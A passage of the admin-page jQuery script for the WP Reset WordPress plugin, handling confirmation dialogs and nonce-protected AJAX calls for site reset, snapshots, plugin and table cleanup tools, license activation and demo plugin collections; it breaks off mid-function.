/**
 * WP Reset
 * https://wpreset.com/
 * (c) WebFactory Ltd, 2017-2021
 */

jQuery(document).ready(function ($) {
  // init tabs
  $('#wp-reset-tabs')
    .tabs({
      create: function () {
        $('#loading-tabs').remove();
      },
      activate: function (event, ui) {
        localStorage.setItem('wp-reset-tabs', $('#wp-reset-tabs').tabs('option', 'active'));
      },
      active: localStorage.getItem('wp-reset-tabs') || 0,
    })
    .show();

  // helper for swithcing tabs & linking anchors in different tabs
  $('.tools_page_wp-reset').on('click', '.change-tab', function (e) {
    e.preventDefault();

    $('#wp-reset-tabs').tabs('option', 'active', $(this).data('tab'));

    // get the link anchor and scroll to it
    target = this.href.split('#')[1];
    if (target) {
      $.scrollTo('#' + target, 500, { offset: { top: -50, left: 0 } });
    }

    $(this).blur();
    return false;
  }); // jump to tab/anchor helper

  // init tooltips
  $('.tooltip').tooltipster({
    theme: ['tooltipster-punk', 'tooltipster-wpr'],
    delay: 0,
  });

  // helper for scrolling to anchor
  $('.tools_page_wp-reset').on('click', '.scrollto', function (e) {
    e.preventDefault();

    // get the link anchor and scroll to it
    target = this.href.split('#')[1];
    if (target) {
      $.scrollTo('#' + target, 500, { offset: { top: -50, left: 0 } });
    }

    $(this).blur();
    return false;
  }); // scroll to anchor helper

  // toggle button dropdown menu
  $('.tools_page_wp-reset').on('click', '.button.dropdown-toggle', function (e) {
    e.preventDefault();

    parent_dropdown = $(this).parent('.dropdown');
    sibling_menu = $(this).siblings('.dropdown-menu');

    $('.dropdown').not(parent_dropdown).removeClass('show');
    $('.dropdown-menu').not(sibling_menu).removeClass('show');

    $(parent_dropdown).toggleClass('show');
    $(sibling_menu).toggleClass('show');

    return false;
  }); // toggle button dropdown menu

  $(document).on('click', ':not(.dropdown-toggle), .dropdown-item', function () {
    wpr_close_dropdowns();
  });

  // delete transients
  $('.tools_page_wp-reset').on('click', '#delete-transients', function (e) {
    e.preventDefault();

    run_tool(this, 'delete_transients');

    return false;
  }); // delete transients

  // purge cache
  $('.tools_page_wp-reset').on('click', '#purge-cache', function (e) {
    e.preventDefault();

    run_tool(this, 'purge_cache');

    return false;
  }); // purge cache

  // delete uploads
  $('.tools_page_wp-reset').on('click', '#delete-uploads', function (e) {
    e.preventDefault();

    run_tool(this, 'delete_uploads');

    return false;
  }); // delete uploads

  // reset theme options (mods)
  $('.tools_page_wp-reset').on('click', '#reset-theme-options', function (e) {
    e.preventDefault();

    run_tool(this, 'reset_theme_options');

    return false;
  }); // reset theme options

  // delete themes
  $('.tools_page_wp-reset').on('click', '#delete-themes', function (e) {
    e.preventDefault();

    run_tool(this, 'delete_themes');

    return false;
  }); // delete themes

  // delete plugins
  $('.tools_page_wp-reset').on('click', '#delete-plugins', function (e) {
    e.preventDefault();

    var button = this;
    var confirm_title = $(button).data('confirm-title') || wp_reset.confirm_title;

    var tools = [
      {
        tool: 'deactivate_plugins',
        description: 'Deactivating plugins.',
        extra_data: { keep_default_theme: 0, keep_current_theme: 0 },
      },
      {
        tool: 'delete_plugins',
        description: 'Deleting plugins.',
        extra_data: {
          keep_wp_reset: 1,
          silent_deactivate: 0,
        },
      },
    ];
    var looper = $.Deferred().resolve();

    confirm_action(
      confirm_title,
      $(button).data('text-confirm'),
      $(button).data('btn-confirm') || $(button).text(),
      wp_reset.cancel_button
    ).then((result) => {
      if (!result.value) {
        return false;
      }

      wpr_swal.fire({
        title: $(button).data('text-wait'),
        text: ' ',
        type: false,
        allowOutsideClick: false,
        allowEscapeKey: false,
        allowEnterKey: false,
        showConfirmButton: false,
        imageUrl: wp_reset.icon_url,
        onOpen: () => {
          $(wpr_swal.getImage()).addClass('wpr_rotating');
        },
        imageWidth: 100,
        imageHeight: 100,
        imageAlt: $(button).data('text-wait'),
      });

      var failed = false;
      $.each(tools, function (i, data) {
        looper = looper.then(function () {
          if (failed) {
            return false;
          }
          wpr_swal.getContent().querySelector('#swal2-content').textContent =
            i + 1 + '/' + tools.length + ' - ' + data.description;
          return $.ajax({
            data: {
              action: 'wp_reset_run_tool',
              _ajax_nonce: wp_reset.nonce_run_tool,
              tool: data.tool,
              extra_data: data.extra_data,
            },
            url: ajaxurl,
          })
            .done(function (response) {
              if (response.success) {
                failed = false;
                if (i == tools.length - 1) {
                  if (response.data == 1) {
                    msg = $(button).data('text-done-singular');
                  } else {
                    msg = $(button).data('text-done').replace('%n', response.data);
                  }
                  wpr_swal_params = { icon: 'success', title: msg };

                  wpr_swal.fire(wpr_swal_params);
                }
              } else {
                wpr_swal.close();
                wpr_swal.fire({
                  icon: 'error',
                  title: wp_reset.documented_error,
                  text: response.data,
                });
                failed = true;
                return false;
              }
            })
            .error(function (response) {
              wpr_swal.close();
              wpr_swal.fire({
                icon: 'error',
                title: wp_reset.undocumented_error,
              });
              failed = true;
              return false;
            });
        });
      });
    }); // confirm ok

    return false;
  }); // delete plugins

  // drop custom tables
  $('.tools_page_wp-reset').on('click', '#drop-custom-tables', function (e) {
    e.preventDefault();

    run_tool(this, 'drop_custom_tables');

    return false;
  }); // drop custom tables

  // truncate custom tables
  $('.tools_page_wp-reset').on('click', '#truncate-custom-tables', function (e) {
    e.preventDefault();

    run_tool(this, 'truncate_custom_tables');

    return false;
  }); // truncate custom tables

  // delete htaccess file
  $('.tools_page_wp-reset').on('click', '#delete-htaccess', function (e) {
    e.preventDefault();

    run_tool(this, 'delete_htaccess');

    return false;
  }); // delete htaccess file

  // delete auth cookies
  $('.tools_page_wp-reset').on('click', '#delete-wp-cookies', function (e) {
    e.preventDefault();

    run_tool(this, 'delete_wp_cookies');

    return false;
  }); // delete auth cookies

  // delete local data
  $('.tools_page_wp-reset').on('click', '#delete-local-data', function (e) {
    e.preventDefault();
    var button = this;
    var confirm_title = $(button).data('confirm-title') || wp_reset.confirm_title;

    confirm_action(
      confirm_title,
      $(button).data('text-confirm'),
      $(button).data('btn-confirm'),
      wp_reset.cancel_button
    ).then((result) => {
      if (!result.value) {
        return false;
      }

      cnt = wpr_clear_local(true, true);
      if (cnt == 1) {
        msg = $(button).data('text-done-singular');
      } else {
        msg = $(button).data('text-done').replace('%n', cnt);
      }
      wpr_swal.fire({
        icon: 'success',
        title: msg,
        timer: 2000,
        timerProgressBar: true,
        showConfirmButton: true,
      });
    });

    return false;
  }); // delete local data

  // compare snapshot
  $('#wpr-snapshots').on('click', '.compare-snapshot', 'click', function (e) {
    e.preventDefault();
    uid = $(this).data('ss-uid');
    button = $(this);

    block_ui($(button).data('wait-msg'));
    $.get({
      url: ajaxurl,
      data: {
        action: 'wp_reset_run_tool',
        _ajax_nonce: wp_reset.nonce_run_tool,
        tool: 'compare_snapshots',
        extra_data: uid,
      },
    })
      .always(function (data) {
        wpr_swal.close();
      })
      .done(function (data) {
        if (data.success) {
          msg = $(button).data('title').replace('%s', $(button).data('name'));
          wpr_swal.fire({
            width: '90%',
            title: msg,
            html: data.data,
            showConfirmButton: false,
            allowEnterKey: false,
            focusConfirm: false,
            showCloseButton: true,
            customClass: 'compare-snapshots',
          });
        } else {
          wpr_swal.fire({
            icon: 'error',
            title: wp_reset.documented_error + ' ' + data.data,
          });
        }
      })
      .fail(function (data) {
        wpr_swal.fire({ icon: 'error', title: wp_reset.undocumented_error });
      });

    return false;
  }); // compare snapshot

  // restore snapshot
  $('#wpr-snapshots').on('click', '.restore-snapshot', 'click', function (e) {
    e.preventDefault();
    uid = $(this).data('ss-uid');

    run_tool(this, 'restore_snapshot', uid);

    return false;
  }); // restore snapshot

  // download snapshot
  $('#wpr-snapshots').on('click', '.download-snapshot', 'click', function (e) {
    e.preventDefault();
    uid = $(this).data('ss-uid');
    button = this;

    block_ui($(this).data('wait-msg'));
    $.get({
      url: ajaxurl,
      data: {
        action: 'wp_reset_run_tool',
        _ajax_nonce: wp_reset.nonce_run_tool,
        tool: 'download_snapshot',
        extra_data: uid,
      },
    })
      .always(function (data) {
        wpr_swal.close();
      })
      .done(function (data) {
        if (data.success) {
          msg = $(button).data('success-msg').replace('%s', data.data);
          wpr_swal.fire({ icon: 'success', title: msg });
        } else {
          wpr_swal.fire({
            icon: 'error',
            title: wp_reset.documented_error + ' ' + data.data,
          });
        }
      })
      .fail(function (data) {
        wpr_swal.fire({ icon: 'error', title: wp_reset.undocumented_error });
      });

    return false;
  }); // download snapshot

  // delete snapshot
  $('#wpr-snapshots').on('click', '.delete-snapshot', 'click', function (e) {
    e.preventDefault();
    uid = $(this).data('ss-uid');

    run_tool(this, 'delete_snapshot', uid);

    return false;
  }); // delete snapshot

  // create snapshot
  $('.tools_page_wp-reset').on('click', '.create-new-snapshot', function (e) {
    e.preventDefault();

    description = $(this).data('description') || '';

    wpr_swal
      .fire({
        title: wp_reset.snapshot_title,
        icon: 'question',
        text: wp_reset.snapshot_text,
        input: 'text',
        inputValue: description,
        inputPlaceholder: wp_reset.snapshot_placeholder,
        showCancelButton: true,
        focusConfirm: false,
        confirmButtonText: wp_reset.snapshot_confirm,
        cancelButtonText: wp_reset.cancel_button,
        width: 600,
      })
      .then((result) => {
        if (typeof result.value != 'undefined') {
          block = block_ui(wp_reset.snapshot_wait);
          $.get({
            url: ajaxurl,
            data: {
              action: 'wp_reset_run_tool',
              _ajax_nonce: wp_reset.nonce_run_tool,
              tool: 'create_snapshot',
              extra_data: result.value,
            },
          })
            .always(function (data) {
              wpr_swal.close();
            })
            .done(function (data) {
              if (data.success) {
                wpr_swal
                  .fire({
                    icon: 'success',
                    title: wp_reset.snapshot_success,
                    timer: 2000,
                    timerProgressBar: true,
                    showConfirmButton: true,
                  })
                  .then((result) => {
                    location.reload();
                  });
              } else {
                wpr_swal.fire({
                  icon: 'error',
                  title: wp_reset.documented_error + ' ' + data.data,
                });
              }
            })
            .fail(function (data) {
              wpr_swal.fire({
                icon: 'error',
                title: wp_reset.undocumented_error,
              });
            });
        } // if confirmed
      });

    return false;
  }); // create snapshot

  // show/hide extra table info in snapshot diff
  $('body.tools_page_wp-reset').on('click', '.header-row', function (e) {
    e.preventDefault();

    parent = $(this).parents('div.wpr-table-container > table > tbody');
    $(' > tr:not(.header-row)', parent).toggleClass('hidden');

    $('span.dashicons', parent).toggleClass('dashicons-arrow-down-alt2').toggleClass('dashicons-arrow-up-alt2');

    return false;
  }); // show hide extra info in diff

  // standard way of running a tool, with confirmation, loading and success message
  function run_tool(button, tool_name, extra_data) {
    var confirm_title = $(button).data('confirm-title') || wp_reset.confirm_title;

    wpr_close_dropdowns();

    confirm_action(
      confirm_title,
      $(button).data('text-confirm'),
      $(button).data('btn-confirm'),
      wp_reset.cancel_button
    ).then((result) => {
      if (result.value) {
        block = block_ui($(button).data('text-wait'));
        $.get({
          url: ajaxurl,
          data: {
            action: 'wp_reset_run_tool',
            _ajax_nonce: wp_reset.nonce_run_tool,
            tool: tool_name,
            extra_data: extra_data,
          },
        })
          .always(function (data) {
            wpr_swal.close();
          })
          .done(function (data) {
            if (data.success) {
              if (data.data == 1) {
                msg = $(button).data('text-done-singular');
              } else {
                msg = $(button).data('text-done').replace('%n', data.data);
              }
              wpr_swal
                .fire({
                  icon: 'success',
                  title: msg,
                  timer: 2000,
                  timerProgressBar: true,
                })
                .then(() => {
                  if (tool_name == 'restore_snapshot') {
                    location.reload();
                  }
                });
              if (tool_name == 'delete_snapshot') {
                $('#wpr-ss-' + extra_data).remove();
                if ($('#wpr-snapshots tr').length <= 1) {
                  $('#wpr-snapshots').hide();
                  $('#ss-no-snapshots').show();
                }
              }
            } else {
              wpr_swal.fire({
                icon: 'error',
                title: wp_reset.documented_error + ' ' + data.data,
              });
            }
          })
          .fail(function (data) {
            wpr_swal.fire({
              icon: 'error',
              title: wp_reset.undocumented_error,
            });
          });
      } // if confirmed
    });
  } // run_tool

  // display a message while an action is performed
  function block_ui(message) {
    tmp = wpr_swal.fire({
      text: message,
      type: false,
      imageUrl: wp_reset.icon_url,
      onOpen: () => {
        $(wpr_swal.getImage()).addClass('rotating');
      },
      imageWidth: 100,
      imageHeight: 100,
      imageAlt: message,
      allowOutsideClick: false,
      allowEscapeKey: false,
      allowEnterKey: false,
      showConfirmButton: false,
    });

    return tmp;
  } // block_ui

  // display dialog to confirm action
  function confirm_action(title, question, btn_confirm, btn_cancel) {
    tmp = wpr_swal.fire({
      title: title,
      icon: 'question',
      html: question,
      showCancelButton: true,
      focusConfirm: false,
      focusCancel: true,
      confirmButtonText: btn_confirm,
      cancelButtonText: btn_cancel,
      confirmButtonColor: '#dd3036',
      width: 650,
    });

    return tmp;
  } // confirm_action

  $('#wp_reset_form').on('submit', function (e, confirmed) {
    if (!confirmed) {
      $('#wp_reset_submit').trigger('click');
      e.preventDefault();
      return false;
    }

    $reset_form = $(this);

    $.get({
        url: ajaxurl,
        data: {
            action: 'wp_reset_run_tool',
            _ajax_nonce: wp_reset.nonce_run_tool,
            tool: 'before_reset'
        },
    }).done(function (data) {
        if (data.success) {
            $reset_form.off('submit').submit();
        } else {
            wpr_swal.fire({
                icon: 'error',
                title: wp_reset.undocumented_error,
            });
        }
    }).fail(function (data) {
        wpr_swal.fire({
            icon: 'error',
            title: wp_reset.undocumented_error,
        });
    });

    return false;
  }); // bypass default submit behaviour

  $('#wp_reset_submit').click(function (e) {
    if ($('#wp_reset_confirm').val() !== 'reset') {
      wpr_swal.fire({
        title: wp_reset.invalid_confirmation_title,
        text: wp_reset.invalid_confirmation,
        icon: 'error',
        confirmButtonText: wp_reset.ok_button,
      });

      e.preventDefault();
      return false;
    } // wrong confirmation code

    message = wp_reset.confirm1 + '<br>' + wp_reset.confirm2;
    wpr_swal
      .fire({
        title: wp_reset.confirm_title_reset,
        icon: 'question',
        html: message,
        showCancelButton: true,
        focusConfirm: false,
        focusCancel: true,
        confirmButtonText: wp_reset.confirm_button,
        cancelButtonText: wp_reset.cancel_button,
        confirmButtonColor: '#dd3036',
        width: 600,
      })
      .then((result) => {
        if (result.value === true) {
          block_ui(wp_reset.doing_reset);
          $('#wp_reset_form').trigger('submit', true);
        }
      });

    e.preventDefault();
    return false;
  }); // reset submit

  // collapse / expand card
  $('.tools_page_wp-reset').on('click', '.toggle-card', function (e, skip_anim) {
    e.preventDefault();

    card = $(this).parents('.card').toggleClass('collapsed');
    $('.dashicons', this).toggleClass('dashicons-arrow-up-alt2').toggleClass('dashicons-arrow-down-alt2');
    $(this).blur();

    if (typeof skip_anim != 'undefined' && skip_anim) {
      $(card).find('.card-body').toggle();
    } else {
      $(card).find('.card-body').slideToggle(500);
    }

    cards = localStorage.getItem('wp-reset-cards');
    if (cards == null) {
      cards = new Object();
    } else {
      cards = JSON.parse(cards);
    }

    card_id = card.attr('id') || $('h4', card).attr('id') || '';

    if (card.hasClass('collapsed')) {
      cards[card_id] = 'collapsed';
    } else {
      cards[card_id] = 'expanded';
    }
    localStorage.setItem('wp-reset-cards', JSON.stringify(cards));

    return false;
  }); // toggle-card

  // handle saved and preset cards' state
  cards_state = localStorage.getItem('wp-reset-cards');
  if (cards_state != null) {
    cards_state = JSON.parse(cards_state);
  } else {
    cards_state = new Object();
  }

  cards = $('.card');
  $.each(cards, function (index, card) {
    card_name = $('h4', card).attr('id');
    if (!card_name) {
      return;
    }

    if (typeof cards_state == 'object' && cards_state.hasOwnProperty(card_name)) {
      if (cards_state[card_name] == 'collapsed') {
        $('a.toggle-card', card).trigger('click', true);
      }
    } else {
      if ($(card).hasClass('default-collapsed')) {
        $('a.toggle-card', card).trigger('click', true);
      }
    }
  });

  // dismiss notice / pointer
  $('.wpr-dismiss-notice').on('click', function (e) {
    notice_name = $(this).data('notice');
    if (!notice_name) {
      return true;
    }

    $.get(ajaxurl, {
      notice_name: notice_name,
      _ajax_nonce: wp_reset.nonce_dismiss_notice,
      action: 'wp_reset_dismiss_notice',
    });

    $(this).parents('.notice-wrapper').fadeOut();

    e.preventDefault();
    return false;
  }); // dismiss notice

  // turn questions into checkboxes
  $('.question-wrapper').on('click', function (e) {
    if ($(this).hasClass('selected')) {
      $(this).removeClass('selected');
    } else {
      if ($('.question-wrapper.selected').length >= 2) {
        wpr_swal.fire({
          icon: 'error',
          allowOutsideClick: false,
          text: 'You can choose only up to 2 features at a time.',
        });
      } else {
        $(this).addClass('selected');
      }
    }

    e.preventDefault();
    return false;
  });

  // todo: not finished
  $('.tools_page_wp-reset').on('click', '.button-pro-feature, .pro-feature', function (e) {
    e.preventDefault();
    this.blur();

    tool_id = $(this).data('feature') || $('.pro-feature', this).data('feature');
    if (!tool_id) {
      $('#wp-reset-tabs').tabs('option', 'active', 5);
      $.scrollTo($('#pro-pricing'), 500, { offset: { top: -50, left: 0 } });
      return;
    }

    details = $('#pro-feature-details-' + tool_id);
    if (details.length != 1) {
      $('#wp-reset-tabs').tabs('option', 'active', 5);
      $.scrollTo($('#pro-pricing'), 500, { offset: { top: -50, left: 0 } });
      return;
    }

    wpr_swal
      .fire({
        title: tool_id,
        html: 'Dialog content',
        footer:
          'See everything WP Reset PRO offers on &nbsp;<a target="_blank" href="https://wpreset.com">wpreset.com</a>',
        icon: '',
        showCloseButton: true,
        focusConfirm: true,
        confirmButtonText: 'Grab the 30% discount',
      })
      .then((result) => {
        if (result.value) {
          $('#wp-reset-tabs').tabs('option', 'active', 5);
          $.scrollTo($('#pro-pricing'), 500, {
            offset: { top: -50, left: 0 },
          });
        }
      });

    return false;
  });

  $('#show-table-details').on('click', function (e) {
    e.preventDefault();

    $.get({
      url: ajaxurl,
      data: {
        action: 'wp_reset_run_tool',
        _ajax_nonce: wp_reset.nonce_run_tool,
        tool: 'get_table_details',
      },
    })
      .done(function (data) {
        if (data.success) {
          $('#wpr-table-details').html(data.data);
        } else {
          wpr_swal.fire({
            type: 'error',
            title: wp_reset.documented_error + ' ' + data.data,
          });
        }
      })
      .fail(function (data) {
        wpr_swal.fire({ type: 'error', title: wp_reset.undocumented_error });
      });

    return false;
  }); // show table details

  $('#wpr-save-license').on('click', function (e) {
    e.preventDefault();

    button = this;
    safe_refresh = true;

    block = block_ui($(button).data('text-wait'));
    wf_licensing_verify_licence_ajax('wpr', $('#wpr-license-key').val(), button);

    return;
  }); // license activation button

  $('#wpr-keyless-activation').on('click', function (e) {
    e.preventDefault();

    button = this;
    safe_refresh = true;

    block = block_ui($(button).data('text-wait'));
    wf_licensing_verify_licence_ajax('wpr', 'keyless', button);

    return;
  }); // keyless license activation button

  $('#wpr-deactivate-license').on('click', function (e) {
    e.preventDefault();

    button = this;
    safe_refresh = true;

    block = block_ui($(button).data('text-wait'));
    wf_licensing_deactivate_licence_ajax('wpr', $('#wpr-license-key').val(), button);

    return;
  }); // deactivate license button

  $('#wpr-license-key').on('keypress', function (e) {
    if (e.keyCode == 13) {
      e.preventDefault();
      $('#wpr-save-license').trigger('click');
    }
  }); // trigger license save on enter

  // Collections
  // for demo purposes only
  var collections_ajax_queue = [];
  var collections_ajax_queue_count = 0;
  var collections_ajax_queue_index = 0;
  var collections_errors = [];
  var collections_retried = false;
  wp_reset.collections = [];
  wp_reset.collections[1] = {
    id: 1,
    name: 'Must Have WordPress Plugins',
    created: '2020-04-01',
    items: [],
  };
  wp_reset.collections[1].items[10] = {
    id: '10',
    type: 'plugin',
    source: 'repo',
    note: '',
    slug: 'eps-301-redirects',
    name: '301 Redirects',
    version: '0.4',
  };

  wp_reset.collections[1].items[11] = {
    id: '11',
    type: 'plugin',
    source: 'repo',
    note: '',
    slug: 'classic-editor',
    name: 'Classic Editor',
    version: '0.4',
  };

  wp_reset.collections[1].items[12] = {
    id: '12',
    type: 'plugin',
    source: 'repo',
    note: '',
    slug: 'simple-author-box',
    name: 'Simple Author Box',
    version: '0.4',
  };

  wp_reset.collections[1].items[13] = {
    id: '13',
    type: 'plugin',
    source: 'repo',
    note: '',
    slug: 'sticky-menu-or-anything-on-scroll',
    name: 'Sticky Menu (or Anything!) on Scroll',
    version: '0.4',
  };

  wp_reset.collections[1].items[14] = {
    id: '14',
    type: 'plugin',
    source: 'repo',
    note: '',
    slug: 'under-construction-page',
    name: 'UnderConstructionPage',
    version: '0.4',
  };

  wp_reset.collections[1].items[15] = {
    id: '15',
    type: 'plugin',
    source: 'repo',
    note: '',
    slug: 'wp-external-links',
    name: 'WP External Links',
    version: '0.4',
  };

  $(document).on('click', '.install-collection', function (e) {
    do_delete = $(this).data('delete');
    do_activate = $(this).data('activate');
    collection_id = $(this).parents('.card').data('collection-id');
    show_install_collection(collection_id, do_delete, do_activate);
  });

  // install collection item
  $('.tools_page_wp-reset').on('click', '.install-collection-item', function (e) {
    e.preventDefault();

    wpr_close_dropdowns();

    collection_id = $(this).parents('.card').data('collection-id');
    collection_item_id = $(this).parents('tr').data('collection-item-id');
    do_activate = $(this).data('activate');

    item_data = wp_reset.collections[collection_id]['items'][collection_item_id];

    wpr_swal
      .fire({
        title: 'Installing <br />' + item_data['name'],
        html: '<div class="wpr-collections-installer"></div>',
        width: 600,
        onRender: function () {
          collections_ajax_queue.push({
            slug: item_data.slug,
            name: item_data.name,
            extra_data: {
              source: item_data.source,
              collection_id: collection_id,
              collection_item_id: collection_item_id,
            },
            action: 'install_' + item_data.type,
          });
          collections_ajax_queue.push({
            slug: item_data.slug,
            name: item_data.name,
            action: 'check_install_' + item_data.type,
          });

          $('.wpr-collections-installer').append(
            '<div class="wpr-collections-installer-message" data-action="' +
              item_data.slug +
              '_install_' +
              item_data.type +
              '"><span class="dashicons"></span>' +
              wp_reset.installing +
              ' ' +
              item_data.name +
              '</div>'
          );

          if (do_activate) {
            collections_ajax_queue.push({
              slug: item_data.slug,
              name: item_data.name,
              action: 'activate_' + item_data.type,
              extra_data: {
                source: item_data.source,
                collection_id: collection_id,
                collection_item_id: collection_item_id,
              },
            });
            collections_ajax_queue.push({
              slug: item_data.slug,
              name: item_data.name,
              action: 'check_activate_' + item_data.type,
            });

            $('.wpr-collections-installer').append(
              '<div class="wpr-collections-installer-message" data-action="' +
                item_data.slug +
                '_activate_' +
                item_data.type +
                '"><span class="dashicons"></span>' +
                wp_reset.activating +
                ' ' +
                item_data.name +
                '</div>'
            );
          }
          collections_do_ajax();
        },
        allowOutsideClick: false,
        allowEscapeKey: false,
        allowEnterKey: false,
        showCancelButton: true,
        confirmButtonText: 'OK',
      })
      .then((result) => {
        collections_ajax_queue = [];
      });

    return false;
  }); // install collection item

  // show install collection popup
  function show_install_collection(collection_id, do_delete, do_activate) {
    wpr_swal
      .fire({
        title: 'Installing collection<br />' + wp_reset.collections[collection_id]['name'],
        html: '<div class="wpr-collections-installer"></div>',
        width: 600,
        onRender: function () {
          install_collection(collection_id, do_activate, do_delete);
        },
        allowOutsideClick: false,
        allowEscapeKey: false,
        allowEnterKey: false,
        showCancelButton: true,
        showConfirmButton: false,
        confirmButtonText: 'OK',
      })
      .then((result) => {
        collections_ajax_queue = [];
      });
  } // show install collection popup

  // create install collection queue and add popup content
  function install_collection(collection_id, do_activate, do_delete) {
    collections_ajax_queue = [];
    collections_ajax_queue_count = 0;
    collections_ajax_queue_index = 0;
    collections_errors = [];

    console.log(wp_reset.collections[collection_id]);

    for (item in wp_reset.collections[collection_id]['items']) {
      item_data = wp_reset.collections[collection_id]['items'][item];
      collections_ajax_queue.push({
        slug: item_data.slug,
        name: item_data.name,
        extra_data: {
          source: item_data.source,
          collection_id: collection_id,
          collection_item_id: item_data.id,
        },
        action: 'install_' + item_data.type,
      });
      collections_ajax_queue.push({
        slug: item_data.slug,
        name: item_data.name,
        action: 'check_install_' + item_data.type,
      });

      if (do_activate) {
        collections_ajax_queue.push({
          slug: item_data.slug,
          name: item_data.name,
          action: 'activate_' + item_data.type,
          extra_data: {
            source: item_data.source,
            collection_id: collection_id,
            collection_item_id: item_data.id,
          },
        });
        collections_ajax_queue.push({
          slug: item_data.slug,
          name: item_data.name,
          action: 'check_activate_' + item_data.type,
        });
      }
    }

    for (ci in collections_ajax_queue) {
      var message = false;
      collections_ajax_queue_count++;

      switch (collections_ajax_queue[ci].action) {
        case 'deactivate_plugin':
          message = wp_reset.deactivating;
          break;
        case 'delete_plugin':
        case 'delete_theme':
          message = wp_reset.deleting;
          break;
        case 'install_plugin':
        case 'install_theme':
          message = wp_reset.installing;
          break;
        case 'activate_plugin':
        case 'activate_theme':
          message = wp_reset.activating;
          break;
        case 'activate_license_plugin':
        case 'activate_license_theme':
          message = wp_reset.activating_license;
          break;
      }

      if (message !== false) {
        $('.wpr-collections-installer').append(
          '<div class="wpr-collections-installer-message" data-action="' +
            collections_ajax_queue[ci].slug +
            '_' +
            collections_ajax_queue[ci].action +
            '"><span class="dashicons"></span> ' +
            message +
            ' ' +
            collections_ajax_queue[ci].name +
            '</div>'
        );
      }
    }

    collections_ajax_queue_count = collections_ajax_queue.length;
    collections_do_ajax();
  } // create install collection queue

  // run collection ajax
  function collections_do_ajax() {
    collection_item = collections_ajax_queue[collections_ajax_queue_index];
    message_id = collection_item.slug + '_' + collection_item.action.replace('check_', '');

    $('[data-action="' + message_id + '"]').addClass('wpr-collections-installer-loading');

    var query_data_type = 'text';
    if (
      collection_item.action == 'check_deactivate_plugin' ||
      collection_item.action == 'check_delete_plugin' ||
      collection_item.action == 'check_install_plugin' ||
      collection_item.action == 'check_activate_plugin' ||
      collection_item.action == 'check_install_theme' ||
      collection_item.action == 'check_activate_theme' ||
      collection_item.action == 'check_delete_theme' ||
      collection_item.action == 'check_activate_license_plugin' ||
      collection_item.action == 'check_activate_license_theme'
    ) {
      query_data_type = 'json';
    }

    if (!('extra_data' in collection_item)) {
      collection_item.extra_data = {};
    }

    $.ajax({
      url: ajaxurl,
      type: 'get',
      dataType: query_data_type,
      data: {
        action: 'wp_reset_run_tool',
        _ajax_nonce: wp_reset.nonce_run_tool,
        tool: collection_item.action,
        slug: collection_item.slug,
        extra_data: collection_item.extra_data,
      },
      complete: function (data) {
        if (typeof data.responseJSON == 'undefined') {
          data = false;
        } else {
          data = data.responseJSON;
        }
        var do_next_called = false;
        if (
          collection_item.action == 'check_deactivate_plugin' ||
          collection_item.action == 'check_delete_plugin' ||
          collection_item.action == 'check_install_plugin' ||
          collection_item.action == 'check_activate_plugin' ||
          collection_item.action == 'check_install_theme' ||
          collection_item.action == 'check_activate_theme' ||
          collection_item.action == 'check_delete_theme' ||
          collection_item.action == 'check_activate_license_plugin' ||
          collection_item.action == 'check_activate_license_theme'
        ) {
          if (data == false && collections_retried == false) {
            collections_retried = true;
            collections_do_ajax();
            return false;
          }
          if (
            (collection_item.action == 'check_deactivate_plugin' && data.data == 'inactive') ||
            (collection_item.action == 'check_delete_plugin' && data.data == 'deleted') ||
            (collection_item.action == 'check_install_plugin' && (data.data == 'inactive' || data.data == 'active')) ||
            (collection_item.action == 'check_activate_plugin' && data.data == 'active') ||
            (collection_item.action == 'check_install_theme' && (data.data == 'inactive' || data.data == 'active')) ||
            (collection_item.action == 'check_activate_theme' && data.data == 'active') ||
            (collection_item.action == 'check_delete_theme' && data.data == 'deleted') ||
            (collection_item.action == 'check_activate_license_plugin' && data.data == 'license_active') ||
            (collection_item.action == 'check_activate_license_theme' && data.data == 'license_active')
          ) {
            $('[data-action="' + message_id + '"]').addClass('wpr-collections-installer-success');
          } else {
            var error = false;
            switch (collection_item.action) {
              case 'check_deactivate_plugin':
                error = wp_reset.deactivate_failed + ' ' + collection_item.name;
                break;
              case 'check_delete_plugin':
              case 'check_delete_theme':
                error = wp_reset.delete_failed + ' ' + collection_item.name;
                break;
              case 'check_install_plugin':
              case 'check_install_theme':
                if (data.data == 'active') {
                  error = collection_item.name + ' ' + wp_reset.install_failed_existing;
                } else if (data.data == 'deleted') {
                  error = wp_reset.install_failed + ' ' + collection_item.name;
                } else {
                  error = data.data;
                }
                break;
              case 'check_activate_plugin':
              case 'check_activate_theme':
                error = wp_reset.activate_failed + ' ' + collection_item.name;
                break;
              case 'check_activate_license_plugin':
              case 'check_activate_license_theme':
                if (data.data == 'unknown') {
                  error = wp_reset.activating_license_unknown + ' ' + collection_item.name;
                } else {
                  error = wp_reset.activating_license_failed + ' ' + collection_item.name;
                }
                break;
              default:
                error = false;
            }

            if (error != false) {
              $('[data-action="' + message_id + '"]').append('<div class="wpr-collections-error">' + error + '</div>');
              collections_errors.push(error);
            }

            $('[data-action="' + message_id + '"]').addClass('wpr-collections-installer-error');
          }

          $('[data-action="' + message_id + '"]').removeClass('wpr-collections-installer-loading');
          $('[data-action="' + message_id + '"]').addClass('wpr-collections-installer-done');
        }

        collections_retried = false;
        collections_ajax_queue_index++;

        if (collections_ajax_queue.length == 0) {
          wpr_swal.close();
          return false;
        }

        if (do_next_called == false && typeof collections_ajax_queue[collections_ajax_queue_index] !== 'undefined') {
          if (typeof $('.wpr-collections-installer div.wpr-collections-installer-done:last').offset() !== 'undefined') {
            var scroll_top =
              $('.wpr-collections-installer div.wpr-collections-installer-done:last').offset().top -
              $('.wpr-collections-installer').offset().top +
              $('.wpr-collections-installer').scrollTop() -
              60;
            $('.wpr-collections-installer').animate({ scrollTop: scroll_top }, 600, function () {
              collections_do_ajax();
            });
          } else {
            collections_do_ajax();
          }
        } else {
          wpr_swal.close();

          $('.wpr-collections-installer').css('padding', '0px 40px');
          $('.wpr-collections-installer').css('height', '236px');

          if (collections_errors.length > 0) {
            var errors_html = '';
            for (e in collections_errors) {
              errors_html +=
                '<div class="wpr-collections-installer-message wpr-collections-installer-error"><span class="dashicons"></span> ' +
                collections_errors[e] +
                '</div>';
            }
            wpr_swal
              .fire({
                icon: 'error',
                title: 'Collection was installed, but the following errors occured!',
                html: '<div class="wpr-collections-installer-errors">' + errors_html + '</div>',
                showConfirmButton: true,
              })
              .then((result) => {
                location.reload();
              });
          } else {
            wpr_swal
              .fire({
                icon: 'success',
                title: 'Collection was installed successfully!',
                showConfirmButton: true,
                timer: 2000,
                timerProgressBar: true,
              })
              .then((result) => {
